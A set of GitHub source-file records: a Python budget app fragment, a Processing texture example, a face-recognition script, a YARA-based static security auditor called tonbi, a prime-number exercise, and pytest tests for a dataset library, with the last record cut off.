budget_3.budget_size\n return\n elif cat_transfer == 4:\n amt_transfer + budget_4.budget_size\n return\n elif cat_transfer == 5:\n amt_transfer + budget_5.budget_size\n return\n else:\n print('Invalid selection!')\n self.transfer(self)\n\n def homepage(self):\n # Acts aas the reception from where different methods can be called based on inputs\n print('Welcome, what would you like to do?')\n print('Press 1. To Withdraw \\n Press 2. To deposit \\n Press 3. For Budget balance \\n Press 4. 
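Note that the approval loop in deposit() above compares with == where it means to assign (auth == True), so auth never changes and the loop body cannot repeat. A working version of that confirm prompt, with illustrative names:

def confirm(prompt='Press 1 to approve and 2 to cancel: '):
    # Loop until the user gives a valid answer, then report the outcome.
    while True:
        choice = input(prompt).strip()
        if choice == '1':
            print('Deposit approved!')
            return True
        if choice == '2':
            print('Cancelled!')
            return False
        print('Invalid Selection')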
To Transfer \\n')\n home_options = int(input())\n if home_options == 1:\n self.withdraw(self)\n elif home_options == 2:\n self.deposit(self)\n elif home_options == 3:\n self.balance(self)\n elif home_options == 4:\n self.transfer(self)\n else:\n print('Invalid selection, Try again')\n\n\nbudget_1 = Budget('Food', 20000)\nbudget_2 = Budget('Clothing', 10000)\nbudget_3 = Budget('Data', 8000)\nbudget_4 = Budget('Entertainment', 6000)\nbudget_5 = Budget('Healthcare', 5000)\n\n################### BUDGET APP ##############################\n\n\n","repo_name":"0diin/Zuri_tasks","sub_path":"Budget2.py","file_name":"Budget2.py","file_ext":"py","file_size_in_byte":4313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"41623870531","text":"\"\"\"\nTexture Quad.\n\nLoad an image and draw it onto a quad. The texture() function sets\nthe texture image. The vertex() function maps the image to the geometry.\n\"\"\"\n\nhalfWidth = None\nhalfHeight = None\nimg = None\n\n\ndef setup():\n global img, halfWidth, halfHeight\n size(640, 360, P3D)\n halfWidth = width / 2.0\n halfHeight = height / 2.0\n img = loadImage(\"berlin-1.jpg\")\n noStroke()\n\n\ndef draw():\n background(0)\n\n translate(halfWidth, halfHeight)\n rotateY(map(mouseX, 0, width, -PI, PI))\n rotateZ(PI / 6)\n\n with beginShape():\n texture(img)\n vertex(-100, -100, 0, 0, 0)\n vertex(100, -100, 0, img.width, 0)\n vertex(100, 100, 0, img.width, img.height)\n vertex(-100, 100, 0, 0, img.height)\n","repo_name":"jdf/processing.py","sub_path":"mode/examples/Topics/Textures/TextureQuad/TextureQuad.pyde","file_name":"TextureQuad.pyde","file_ext":"pyde","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":1589,"dataset":"github-code","pt":"83"} +{"seq_id":"1760453869","text":"import face_recognition\r\nimport imutils\r\nimport pickle\r\nimport time\r\nimport cv2\r\nimport os\r\n\r\nimport numpy as np\r\n \r\n\r\ncascPathface = os.path.dirname(\r\n cv2.__file__) + \"/data/haarcascade_frontalface_alt2.xml\"\r\n\r\nfaceCascade = cv2.CascadeClassifier(\"haarcascade_frontalface_alt_tree.xml\")\r\n\r\ndata = pickle.loads(open('face_enc', \"rb\").read())\r\n\r\nprint(data)\r\n\r\nimage = cv2.imread('face.jpg')\r\n\r\nrgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\r\n\r\ngray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\r\n\r\nfaces = faceCascade.detectMultiScale(gray,\r\n scaleFactor=1.1,\r\n minNeighbors=4,\r\n minSize=(60, 60),\r\n )\r\nprint(faces)\r\n\r\nencodings = face_recognition.face_encodings(rgb)\r\nnames = []\r\nfiltered_faces =[]\r\n\r\nfor encoding in encodings:\r\n\r\n best =10000\r\n name = 'none'\r\n \r\n\r\n matches = face_recognition.compare_faces(data[\"encodings\"],\r\n encoding)\r\n\r\n print(f' matches {matches}')\r\n if True in matches :\r\n\r\n matchedIdxs = [i for (i, b) in enumerate(matches) if b]\r\n print(f' matched indses {matchedIdxs}')\r\n counts = {}\r\n\r\n f = ''\r\n for i in matchedIdxs:\r\n\r\n name = data[\"names\"][matchedIdxs[0]]\r\n\r\n counts[name] = counts.get(name, 0) + 1\r\n\r\n name = max(counts, key=counts.get)\r\n\r\n name = data[\"names\"][matchedIdxs.index(i)]\r\n\r\n names.append(name)\r\n\r\n for ((x, y, w, h), name) in zip(faces, names):\r\n\r\n cv2.rectangle(image, (x, y), (x + w, y + h), (0, 255, 0), 2)\r\n cv2.putText(image, name, (x, y), cv2.FONT_HERSHEY_SIMPLEX,\r\n 0.75, (0, 255, 0), 2)\r\n print(f' data {data[\"names\"]}')\r\n\r\ncv2.imshow(\"Frame\", 
image)\r\ncv2.waitKey(0)","repo_name":"MustafaMetwally4/Expert-Sestem-Project-Face_Recognation-","sub_path":"FaceRecognition.py","file_name":"FaceRecognition.py","file_ext":"py","file_size_in_byte":1826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"30599645198","text":"#!/usr/bin/python3\n\nfrom optparse import OptionParser\nfrom optparse import OptionGroup\nimport os\nimport json \nimport re\nimport importlib\nimport yara \nimport os\nimport logging, sys\n\nlogging.basicConfig(stream=sys.stderr, level=logging.DEBUG)\n\n#relative path\ntonbi_dir = os.path.dirname(__file__)\nframework_dir = os.path.join(tonbi_dir, 'framework')\nlanguage_dir = os.path.join(tonbi_dir, 'language')\nview_dir = os.path.join(tonbi_dir, 'view')\nplugin_dir = os.path.join(tonbi_dir, 'plugin')\n\n#default 3+3, 6lines will show you\nDEFAULT_LINES = 3 \n#one line can't limit 500 ascii characters\nLIMIT_LINE_LEN = 1024 \n#basic ignore image files \nDEFAULT_IGNORE = [ \"jpg\", \"png\", \"jpeg\", \"ico\", \"gif\", \"tif\" , \"tiff\", \"bmp\" ] \n#default knowledge based database file \nKBDB_FILE = \"kbdb.json\"\nYARA_EXT = \"yar\"\n\n\n\nclass bcolors:\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKCYAN = '\\033[96m'\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n\n# debug_print() will be deprecated \ndef debug_print(str):\n\tif config.debug_mode : \n\t\tprint('DEBUG: ', str) \n\n\nclass Config : \n\tdebug_mode = False \n\tconfig_file =\"\"\n\tsource_directory = \"\"\n\tframework_name = \"\"\n\tview_name = \"\" \n\tlanguage = \"\"\n\thead_count = DEFAULT_LINES \n\ttail_count = DEFAULT_LINES \n\toutput = \"\"\n\tplugins = []\n\tignore_files = [] \n\tignore_dirs = [] \n\texclude = [] \n\n\nclass Plugin:\n\tdic = dict()\n\tobjs = dict() \n'''\nclass MyPlugin :\n def init(self):\n # firstly loaded \n def audit(self, line, lines, output):\n # called by every line \n def finish(self)\n # please clear all resource \n'''\n\n\nclass Kbdb :\n\tdic = \"\" \n\nclass Yara : \n\tframework_rules = \"\" \n\tlanguage_rules = \"\"\n\tview_rules = \"\" \n\nclass Output :\n\tlist = [] \n\nclass AuditItem:\n\toutput = \"\"\n\tlines = \"\"\n\tline = \"\"\n\ti = 0 \n\tfilename = \"\" \n\n\nconfig = Config() \nkbdb = Kbdb() \nplugin = Plugin() \noutput = Output()\nmyyara = Yara() \n\n\n# create logger\nlogger = logging.getLogger('tonbi')\nlogger.setLevel(logging.WARNING)\nch = logging.StreamHandler()\nch.setLevel(logging.DEBUG)\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nch.setFormatter(formatter)\nlogger.addHandler(ch)\n#logger.debug('debug message')\n\n\ndef prepare_output():\n\tif(config.output):\n\t\tif( os.path.exists( config.output)):\n\t\t\tos.remove(config.output)\n\n\ndef check_config():\n\tprint(\"check configuration...\")\n\ttry:\n\t\tos.stat(config.source_directory)\n\texcept :\n\t\tprint(\"source directory not found : \", config.source_directory)\n\t\texit()\n\n\ttry : \n\t\trulefile = config.framework_name + \".\" + YARA_EXT\n\t\tfilename = os.path.join(framework_dir, rulefile)\n\t\tos.stat(filename)\n\texcept:\n\t\tprint(\"framework not found : \", config.framework_name)\n\t\texit()\n\t\n\ttry : \n\t\trulefile = config.language + \".\" + YARA_EXT\n\t\tfilename = os.path.join(language_dir, rulefile)\n\t\tos.stat(filename) \n\texcept:\n\t\tprint(\"language not found : \", config.language )\n\t\texit()\n\n\n\tif config.view_name : 
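compare_faces in the face-recognition script above only yields booleans at a fixed tolerance; face_recognition.face_distance exposes the underlying distances, so the closest known face can be picked directly. A sketch, assuming data['encodings'] and data['names'] are loaded as in that script (0.6 is the library's default tolerance):

import numpy as np
import face_recognition

def best_match(known_encodings, known_names, encoding, tolerance=0.6):
    distances = face_recognition.face_distance(known_encodings, encoding)
    i = int(np.argmin(distances))
    return known_names[i] if distances[i] <= tolerance else 'Unknown'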
\n\t\ttry:\n\t\t\trulefile = config.view_name + \".\" + YARA_EXT\n\t\t\tfilename = os.path.join(view_dir, rulefile)\n\t\t\tos.stat(filename)\n\t\texcept: \n\t\t\tprint(\"view not found : \", config.view_name)\n\t\t\texit()\n\n\tif config.plugins : \n\t\tfor p in config.plugins :\n\t\t\tif p : \n\t\t\t\tpluginfile = p + \".py\"\n\t\t\t\tplugindir = os.path.join(plugin_dir, p)\n\t\t\t\tplugin_filename = os.path.join(plugindir, pluginfile)\n\t\t\t\ttry : \n\t\t\t\t\tos.stat(plugin_filename) \n\t\t\t\texcept:\n\t\t\t\t\tprint(\"plugin not found : \", p)\n\t\t\t\t\texit()\n\t\t\t\n\ndef load_config():\n\tprint(\"load config setting \")\n\twith open ( config.config_file ) as f:\n\t\tconfig_dic = json.load(f)\n\t\tlogger.debug('config_dic(json): %r', config_dic) \n\t\t\n\t\t# TODO set config dic \n\t\tif( \"source_directory\" in config_dic ):\n\t\t\tconfig.source_directory = config_dic[\"source_directory\"] \n\n\t\tif(\"framework_name\" in config_dic ):\n\t\t\tconfig.framework_name = config_dic[\"framework_name\"] \n\n\t\tif(\"language\" in config_dic):\n\t\t\tconfig.language = config_dic[\"language\"]\n\n\t\tif(\"head_count\" in config_dic) :\n\t\t\tconfig.head_count = config_dic[\"head_count\"] \n\t\t\n\t\tif(\"tail_count\" in config_dic):\n\t\t\tconfig.tail_count = config_dic[\"tail_count\"] \n\t\t\n\t\tif(\"ignore_files\" in config_dic):\n\t\t\tconfig.ignore_files = config_dic[\"ignore_files\"]\n\n\t\tif(\"view_name\" in config_dic) :\n\t\t\tconfig.view_name = config_dic[\"view_name\"] \n\n\t\tif(\"output\" in config_dic):\n\t\t\tconfig.output = config_dic[\"output\"] \n\t\t\n\t\tif(\"plugins\" in config_dic ):\n\t\t\tconfig.plugins = config_dic[\"plugins\"] \n\t\t\n\t\tif(\"ignore_dirs\" in config_dic):\n\t\t\tconfig.ignore_dirs = config_dic[\"ignore_dirs\"]\n\n\t\tif(\"exclude\" in config_dic):\n\t\t\tconfig.exclude = config_dic[\"exclude\"]\n\n\tlogger.debug(\"config(class): %s\", config)\n\t\n \ndef kbdb_load_framework() :\n\tprint (\"load framework ...\" )\n\tfilename = \"./framework/\" + config.framework_name + \"/\" + KBDB_FILE\n\twith open( filename ) as f : \n\t\tkbdb.dic = json.load(f) \n\t\tlogger.debug(kbdb.dic) \n\n \ndef yara_load_framework() :\n\tprint (\"load framework ...\" )\n\trulefile = config.framework_name + \".\" + YARA_EXT\n\tfilename = os.path.join(framework_dir, rulefile)\n\twith open( filename ) as f : \n\t\tmyyara.framework_rules = yara.compile(filepath=filename)\n\t\tlogger.debug('framework_rules: %r', myyara.framework_rules) \n\ndef yara_load_language() :\n\tprint (\"load language ...\" )\n\trulefile = config.language + \".\" + YARA_EXT\n\tfilename = os.path.join(language_dir, rulefile)\n\twith open( filename ) as f : \n\t\tmyyara.language_rules = yara.compile(filepath=filename)\n\t\tlogger.debug('language_rules: %r', myyara.language_rules) \n\ndef yara_load_view() :\n\tif config.view_name == \"\" :\n\t\treturn \n\t\t\n\tprint (\"load view ...\" )\n\trulefile = config.view_name + \".\" + YARA_EXT\n\tfilename = os.path.join(view_dir, rulefile)\n\twith open( filename ) as f : \n\t\tmyyara.view_rules = yara.compile(filepath=filename)\n\t\tlogger.debug('view_rules: %r', myyara.view_rules) \n\n\ndef kbdb_add_vulnerability(filename, lines, item, match):\n\tvulnerability = \"\"\n\tvulnerability += \"==================================================\\n\" \n\tvulnerability += \"vulnerability : \" + item[\"vulnerability\"] + \"\\n\" \n\tvulnerability += \"description : \" + item[\"description\"] + \"\\n\" \n\tif (config.debug_mode):\n\t\tvulnerability += \"vulnerability : 
\" + match[0] + \"\\n\" \n\tvulnerability += \"reference : \" + item[\"reference\"] + \"\\n\" \n\tvulnerability += \"filename : \" + filename + \"\\n\" \n\tvulnerability += \"=================================================\\n\" \n\tvulnerability += lines + \"\\n\"\n\toutput.list.append(vulnerability)\n\n\ndef yara_add_vulnerability(filename, lines, matches):\n\tif (type(matches) is list ): # maches returns list \n\t\tmatch = matches[0]\n\telse:\n\t\tmatch = matches \n\n\t\n\t#exclude some vulnerabilities \n\tfor vulname in config.exclude:\n\t\tif vulname == match.rule:\n\t\t\tlogger.debug(\"EXCLUDE %s, %s\", vulname, str(config.exclude))\n\t\t\treturn \n\t\n\tlength, variable, m_string = match.strings[0]\n\tpattern = str(m_string, 'utf-8')\n\n\tvulnerability = \"\"\n\tvulnerability += \"==================================================\\n\" \n\tvulnerability += \"filename : \" + filename + \"\\n\" \n\tvulnerability += \"vulnerability : \" + match.rule + \"\\n\" \n\tvulnerability += \"matches : \" + pattern + \"\\n\" \n\tif match.tags: \n\t\tvulnerability += \"tag : \" + match.tags[0] + \"\\n\" \n\tvulnerability += \"=================================================\\n\" \n\tvulnerability += lines + \"\\n\"\n\toutput.list.append(vulnerability)\n\ndef print_output():\n\tif ( config.output) : \n\t\twith open(config.output, \"a\") as f : \n\t\t\tfor vul in Output.list :\n\t\t\t\tf.write( vul) \n\t\t\tf.close()\n\t\t\tprint(\"The result successfully saved : \" + config.output)\n\telse:\n\t\tfor vul in Output.list :\n\t\t\tprint(vul) \n\ndef import_path(path):\n\t#module_name = os.path.basename(path).replace('-', '_')\n\tmodule_name = os.path.basename(path)\n\tspec = importlib.util.spec_from_loader(\n\t\tmodule_name,\n\t\timportlib.machinery.SourceFileLoader(module_name, path)\n\t)\n\tmodule = importlib.util.module_from_spec(spec)\n\tspec.loader.exec_module(module)\n\t#sys.modules[module_name] = module\n\treturn module\n\n\ndef load_plugin() : \n\tprint (\"load plugins ...\" )\n\t\n\t# python 3.5~ \n\tif config.plugins : \n\t\tfor p in config.plugins :\n\t\t\tif p : \n\t\t\t\tpluginfile = p + \".py\"\n\t\t\t\tplugindir = os.path.join(plugin_dir, p)\n\t\t\t\tplugin_filename = os.path.join(plugindir, pluginfile)\n\t\t\t\tplugin.dic[p] = import_path(plugin_filename)\n\t\t\t\n\t\t\t\t# myplugin = plugin.dic[\"myplugin\"].MyPlugin()\n\t\t\t\t# myplugin.init() \n\t\t\t\tplugin.objs[p] = plugin.dic[p].MyPlugin() # class MyPlugin() \n\t\t\t\tplugin.objs[p].init() # MyPlugin.init()\t\t\n\n\ndef unload_plugin():\n\tif config.plugins : \n\t\tfor p in config.plugins :\n\t\t\tif p : \n\t\t\t\tplugin.objs[p].finish() # MyPlugin.finish()\t\n\n\ndef start_audit() : \n\tprint(\"start audit ...\") \n\twalk_around( config.source_directory) \n\n\ndef sequence_find( line, keyword_array):\n\tn = 0\n\tfound_count =0 \n\tkeyword_count = len(keyword_array) \n\tlogger.debug(\"search word = %s\", str(keyword_count) ) \n\tfor key in keyword_array : \n\t\tn = line.find( key, n ) \n\t\tif ( n == -1 ): # not found \n\t\t\treturn False \n\t\telse : #found \n\t\t\tfound_count = found_count+1\n\n\tif ( keyword_count == found_count ):\n\t\t\treturn True \n\telse:\n\t\treturn False \n\t\n\ndef scrap_lines(line, datafile, i):\n\tlines =\"\"\n\thead_n = i-config.head_count\n\ttail_n = i+config.tail_count+1\n\n\tif head_n > 0 :\n\t\tif tail_n < len(datafile) :\n\t\t\tj = head_n \n\t\t\tfor x in datafile[head_n:tail_n] : \n\t\t\t\tlines += str(j) + \": \" + x \n\t\t\t\tj =j +1 \n\t\telse :\n\t\t\ttail_n = len(datafile)\n\t\t\tj = 
head_n \n\t\t\tfor x in datafile[head_n:tail_n] : \n\t\t\t\tlines += str(j) + \": \" + x \n\t\t\t\tj =j +1\n\telse :\n\t\thead_n = 0 \n\t\tj = head_n \n\t\tfor x in datafile[head_n:tail_n] : \n\t\t\tlines += str(j) + \": \" + x \n\t\t\tj =j +1\n\t\t#lines += str(i) + \": \" + line \n\t\n\treturn lines \n\n\ndef kbdb_audit( filename) :\n\tprint(\"audit file with kbdb : \" + filename ) \n\ttry: \n\t\twith open( filename, errors='replace' ) as f :\n\t\t\ti = 0\n\t\t\tlines = \"\"\n\t\t\tdatafile = f.readlines()\n\t\t\taudititem = AuditItem() \n\t\t\taudititem.output = output\n\t\t\tAuditItem.filename = filename \n\t\t\t\n\t\t\tfor line in datafile :\n\t\t\t\t#1. general framework kbdb search\n\t\t\t\tfor item in kbdb.dic[\"items\"] : \n\t\t\t\t\tlogger.debug(\"json escape : %s\", item[\"keyword\"])\n\t\t\t\t\t#if any(x in line for x in item[\"keyword\"]):\n\t\t\t\t\t#if(sequence_find(line, item[\"keyword\"])):\n\t\t\t\t\tkey = item[\"keyword\"]\n\t\t\t\t\t#key = key.replace('\\\\\\\\','\\\\')\n\t\t\t\t\t#logger.debug(\"json escaped: \" + key)\n\t\t\t\t\tmatch = re.search(key, line)\n\t\t\t\t\tif match:\n\t\t\t\t\t\thead_n = i-config.head_count\n\t\t\t\t\t\ttail_n = i+config.tail_count+1\n\n\t\t\t\t\t\tif ( head_n > 0 and tail_n < len(datafile) ):\n\t\t\t\t\t\t\tj = head_n \n\t\t\t\t\t\t\tfor x in datafile[head_n:tail_n] : \n\t\t\t\t\t\t\t\tlines += str(j) + \": \" + x\n\t\t\t\t\t\t\t\tj =j +1 \n\t\t\t\t\t\telse : \n\t\t\t\t\t\t\tlines += str(i) + \": \" + line \n\n\t\t\t\t\t\tkabdb_add_vulnerability(filename, lines, item, match) \n\t\t\t\t\t\tlines = \"\"\n\t\t\t\t#2. plugin search \n\t\t\t\tfor p in config.plugins :\n\t\t\t\t\taudititem.lines = scrap_lines(line, datafile,i)\n\t\t\t\t\taudititem.line = line \n\t\t\t\t\taudititem.i = i \n\t\t\t\t\t\n\t\t\t\t\tplugin.objs[p].audit(audititem) # MyPlugin.audit()\t\n\t\t\t\t\t\n\t\t\t\ti = i+1 \n\texcept IOError:\n\t\tprint (\"Could not read file:\", filename)\n\n\n\n\ndef yara_audit( filename) :\n\tlogger.debug(\"[%s][%s][%s] : \" %(config.language, config.framework_name, config.view_name) + filename ) \n\ttry: \n\t\twith open( filename, errors='replace' ) as f :\n\t\t\ti = 0\n\t\t\tlines = \"\"\n\t\t\tdatafile = f.readlines()\n\t\t\taudititem = AuditItem() \n\t\t\taudititem.output = output\n\t\t\tAuditItem.filename = filename \n\t\t\t\n\t\t\tfor line in datafile :\n\t\t\t\t#0. give up when its length is over 500 characters cause cpu goes bust\n\t\t\t\tif (len(line) > LIMIT_LINE_LEN ):\n\t\t\t\t\tprint(\"failed to analysis : one line is too long ... \")\n\t\t\t\t\tcontinue \n\t\t\t\t\n\t\t\t\t#1. framework yara search\n\t\t\t\tmatches = myyara.framework_rules.match(data=line)\n\t\t\t\tif matches:\n\t\t\t\t\tlines = scrap_lines(line, datafile,i)\n\t\t\t\t\tyara_add_vulnerability(filename, lines, matches) \n\t\t\t\t\tlines = \"\"\n\n\t\t\t\t#2. language yara search\n\t\t\t\tmatches = myyara.language_rules.match(data=line)\n\t\t\t\tif matches:\n\t\t\t\t\tlines = scrap_lines(line, datafile,i)\n\t\t\t\t\tyara_add_vulnerability(filename, lines, matches) \n\t\t\t\t\tlines = \"\"\n\n\t\t\t\t#3. view yara search\n\t\t\t\tif config.view_name != \"\" :\n\t\t\t\t\tmatches = myyara.view_rules.match(data=line)\n\t\t\t\t\tif matches:\n\t\t\t\t\t\tlines = scrap_lines(line, datafile,i)\n\t\t\t\t\t\tyara_add_vulnerability(filename, lines, matches) \n\t\t\t\t\t\tlines = \"\"\n\t\t\t\t\n\t\t\t\t#3. 
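scrap_lines above clamps the head/tail window with three explicit cases; max/min plus a single range covers all of them. A compact equivalent that keeps the same "lineno: text" convention:

def context_window(lines, i, head=3, tail=3):
    start = max(0, i - head)
    end = min(len(lines), i + tail + 1)
    return ''.join('{}: {}'.format(j, lines[j]) for j in range(start, end))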
plugin search \n\t\t\t\tif config.plugins : \n\t\t\t\t\tfor p in config.plugins :\n\t\t\t\t\t\tif p : \n\t\t\t\t\t\t\taudititem.lines = scrap_lines(line, datafile,i)\n\t\t\t\t\t\t\taudititem.line = line \n\t\t\t\t\t\t\taudititem.i = i \n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tplugin.objs[p].audit(audititem) # MyPlugin.audit()\t\n\t\t\t\t\t\n\t\t\t\ti = i+1 \n\texcept IOError:\n\t\tprint (\"Could not read file:\", filename)\n\n\nfrom tqdm import tqdm\nimport time\n\n\n\ndef walk_around(dirname):\n\tpbar = tqdm(os.walk(dirname))\n\tfor (path, dirs, files) in pbar:\n\t\t\n\t\tpbar.set_description(\"processing\")\n\t\t\n\t\t\t\t\n\t\tif (config.ignore_dirs):\n\t\t\tdirs[:] = [d for d in dirs if d not in config.ignore_dirs]\n\n\t\tfor filename in files:\t\t\n\n\t\t\tfull_filename = os.path.join(path, filename) \n\t\t\t(base, ext ) = os.path.splitext( full_filename ) \n\t\t\tif(config.ignore_files):\n\t\t\t\texclude_exts = config.ignore_files \n\t\t\telse:\n\t\t\t\texclude_exts = DEFAULT_IGNORE\n\n\t\t\tif any(x in ext for x in exclude_exts):\n\t\t\t\tcontinue \n\t\t\telse : # start audit \n\t\t\t\tlogger.debug('full filename : %s', full_filename) \n\t\t\t\t#kbdb_audit(full_filename)\n\t\t\t\tyara_audit(full_filename)\n\tpbar.close() \n\n\n\n\t\ndef main():\n\tusage = \"usage: %prog [options] args\"\n\tparser = OptionParser(usage)\n\n\tparser.add_option(\"-c\", \"--config\", dest=\"config\", help=\"set configuration file ex) -c config.json\")\n\tparser.add_option(\"-d\", \"--directory\", dest=\"directory\", help=\"set source directory ex ) -d /src\")\n\tparser.add_option(\"-l\", \"--language\", dest=\"language\", help=\"set language ex) -l php\")\n\tparser.add_option(\"-f\", \"--framework\", dest=\"framework\", help=\"set framework ex) -f laravel \")\n\tparser.add_option(\"-v\", \"--view\", dest=\"view\", help=\"set render or view ex) -v smarty\")\n\n\tgroup = OptionGroup(parser, \"Output Options\")\n\t\n\tgroup.add_option(\"-o\", \"--output\", dest=\"output\", help=\"save result into file ex) -o output.txt\")\n\tgroup.add_option(\"-e\", \"--exclude\", dest=\"exclude\", action='append', default=[], help=\"exclude some vulnerability ex) -e 'ssl_misconfiguration'\" ) \n\tgroup.add_option(\"--head\", type=\"int\", dest=\"head\", help=\"show above lines ex) --head 5\")\n\tgroup.add_option(\"--tail\", type=\"int\", dest=\"tail\", help=\"show below lines ex) --tail 5\")\n\tparser.add_option_group(group)\n\n\tgroup = OptionGroup(parser, \"Debug Options\")\n\tgroup.add_option(\"-D\", \"--debug\", dest=\"debug\", help=\"debug mode output of dbg_print\", action=\"store_true\")\n\tparser.add_option_group(group)\n\t\n\n\t(options, args) = parser.parse_args()\n\n\tif( options.debug ):\n\t\tconfig.debug_mode = True\n\t\tlogger.setLevel(logging.DEBUG)\n\n\tif (options.directory ):\n\t\t\tconfig.source_directory = options.directory \n\telse:\n\t\tif(options.config is None):\n\t\t\tparser.error(\"app source directory not defined\")\n\n\tif (options.framework):\n\t\t\tconfig.framework_name = options.framework \n\telse :\n\t\tif(options.config is None):\n\t\t\tparser.error(\"app framework name not defined\") \n\n\tif (options.language):\n\t\t\tconfig.language = options.language \n\telse :\n\t\tif(options.config is None ):\n\t\t\tparser.error(\"app language name not defined\") \n\n\tif (options.view):\n\t\t\tconfig.view_name = options.view \n\n\tif (options.output):\n\t\t\tconfig.output = options.output \n\n\tif (options.head):\n\t\t\tconfig.head_count = options.head \n\n\tif (options.tail):\n\t\t\tconfig.tail_count = 
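walk_around above relies on the in-place slice assignment dirs[:] = ...; rebinding dirs with a plain = would not stop os.walk from descending into ignored directories. The pruning plus extension filter in isolation (default sets here are illustrative):

import os

def iter_source_files(root, ignore_dirs=frozenset({'.git'}),
                      ignore_exts=frozenset({'.jpg', '.png'})):
    for path, dirs, files in os.walk(root):
        dirs[:] = [d for d in dirs if d not in ignore_dirs]  # prune in place
        for name in files:
            if os.path.splitext(name)[1].lower() not in ignore_exts:
                yield os.path.join(path, name)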
options.tail \n\n\tif(options.exclude):\n\t\t\tlogger.debug(\"EXCLUDE %s\", str(options.exclude))\n\t\t\tconfig.exclude = options.exclude \n\n\tif (options.config): \n\t\tconfig.config_file = options.config \n\t\tload_config()\n\n\n\tcheck_config() \n\n\t#kbdb_load_framework()\n\tyara_load_framework() \n\n\tyara_load_language()\n\n\tyara_load_view() \n\n\tload_plugin() \n\n\tprepare_output()\n\n\tstart_audit() \n\n\tprint_output()\n\n\tunload_plugin() \n\nif __name__ == \"__main__\":\n main()\n","repo_name":"truefinder/tonbi","sub_path":"tonbi.py","file_name":"tonbi.py","file_ext":"py","file_size_in_byte":15815,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"83"} +{"seq_id":"70757619152","text":"import sys\r\nM,N=map(int, sys.stdin.readline().rstrip().split())\r\nfor num in range(M, N+1):\r\n flag=0\r\n if num==1:\r\n continue\r\n else:\r\n for i in range(2,int(num**0.5)+1):\r\n if num%i==0:\r\n flag=1\r\n break\r\n if flag==0:\r\n print(num)","repo_name":"ChangyungKim/BOJexercise","sub_path":"백준/Silver/1929. 소수 구하기/소수 구하기.py","file_name":"소수 구하기.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"12798645518","text":"import pytest\nimport numpy\nfrom pathlib import Path\nimport zipfile\nimport soundfile\nimport jbof\n\n@pytest.fixture\ndef empty_tmp_dataset(request):\n d = jbof.create_dataset('tmp', {'kind': 'dataset'})\n request.addfinalizer(lambda: jbof.delete_dataset(d))\n yield d\n\n@pytest.fixture\ndef tmp_dataset(request):\n d = jbof.create_dataset('tmp', {'kind': 'dataset'})\n request.addfinalizer(lambda: jbof.delete_dataset(d))\n e = d.add_item(name='first', metadata={'kind': 'item'})\n e.add_array('ones', numpy.ones(10), {'kind': 'ones'}, fileformat='wav', samplerate=8000)\n e.add_array('zeros', numpy.zeros(10), {'kind': 'zeros'}, fileformat='flac', samplerate=16000)\n e.add_array('ones', numpy.ones(10), {'kind': 'ones'}, fileformat='ogg', samplerate=44100)\n e.add_array('ones', numpy.ones(10), {'kind': 'ones'}, fileformat='mat')\n e = d.add_item(metadata={'kind': 'item'})\n e.add_array('twos', numpy.ones(10)*2, {'kind': 'twos'})\n yield d\n\ndef test_dataset(tmp_dataset):\n with pytest.raises(TypeError):\n d = jbof.DataSet('doesnotexist')\n d = jbof.DataSet('tmp')\n assert d.metadata == {'kind': 'dataset'}\n\ndef test_import_dataset(tmp_dataset):\n from tmp import dataset as data\n assert data._directory.absolute() == tmp_dataset._directory.absolute()\n\ndef test_items(tmp_dataset):\n items = list(tmp_dataset.all_items())\n assert tmp_dataset.has_item('first')\n assert 'first' in tmp_dataset\n assert not tmp_dataset.has_item('doesnotexist')\n assert 'doesnotexist' not in tmp_dataset\n assert tmp_dataset.get_item('first') in items\n assert len(items) == 2\n for item in items:\n assert item.metadata == {'kind': 'item'}\n\ndef test_arrays(tmp_dataset):\n visited_arrays = []\n assert tmp_dataset.get_item('first').has_array('ones')\n assert 'ones' in tmp_dataset.get_item('first')\n assert not tmp_dataset.get_item('first').has_array('doesnotexist')\n assert 'doesnotexist' not in tmp_dataset.get_item('first')\n for item in tmp_dataset.all_items():\n for name, array in item.all_arrays():\n assert numpy.all(array == {'zeros': 0, 'ones': 1, 'twos': 2}[name])\n if Path(array._filename).suffix in ['.wav', '.flac', '.ogg']:\n assert(array.metadata['samplerate'])\n else:\n assert len(array.metadata) == 1\n assert array.metadata['kind'] == name\n 
assert hasattr(array, '_filename')\n visited_arrays.append(name)\n assert sorted(visited_arrays) == ['ones', 'twos', 'zeros']\n\ndef test_create_existing_dataset_raises_error(empty_tmp_dataset):\n with pytest.raises(TypeError):\n jbof.create_dataset('tmp')\n\ndef test_add_existing_item_raises_error(empty_tmp_dataset):\n e = empty_tmp_dataset.add_item({'kind': 'item1'})\n with pytest.raises(TypeError):\n empty_tmp_dataset.add_item({'kind': 'item1'})\n\ndef test_add_existing_array_raises_error(empty_tmp_dataset):\n e = empty_tmp_dataset.add_item()\n e.add_array('tmp', [])\n with pytest.raises(TypeError):\n e.add_array('tmp', [])\n\ndef test_add_array_from_file(empty_tmp_dataset):\n e = empty_tmp_dataset.add_item()\n numpy.save('tmp.npy', numpy.ones(5))\n e.add_array_from_file('array', 'tmp.npy')\n assert numpy.all(e.array == 1)\n assert len(e.array) == 5\n Path('tmp.npy').unlink()\n\ndef test_add_array_from_audio_file(empty_tmp_dataset):\n e = empty_tmp_dataset.add_item()\n soundfile.write('tmp.wav', numpy.zeros(44100), 44100)\n e.add_array_from_file('array', 'tmp.wav')\n assert numpy.all(e.array == 0)\n assert len(e.array) == 44100\n assert e.array.metadata['samplerate'] == 44100\n Path('tmp.wav').unlink()\n\ndef test_audio_array(empty_tmp_dataset):\n e = empty_tmp_dataset.add_item()\n e.add_array('array', 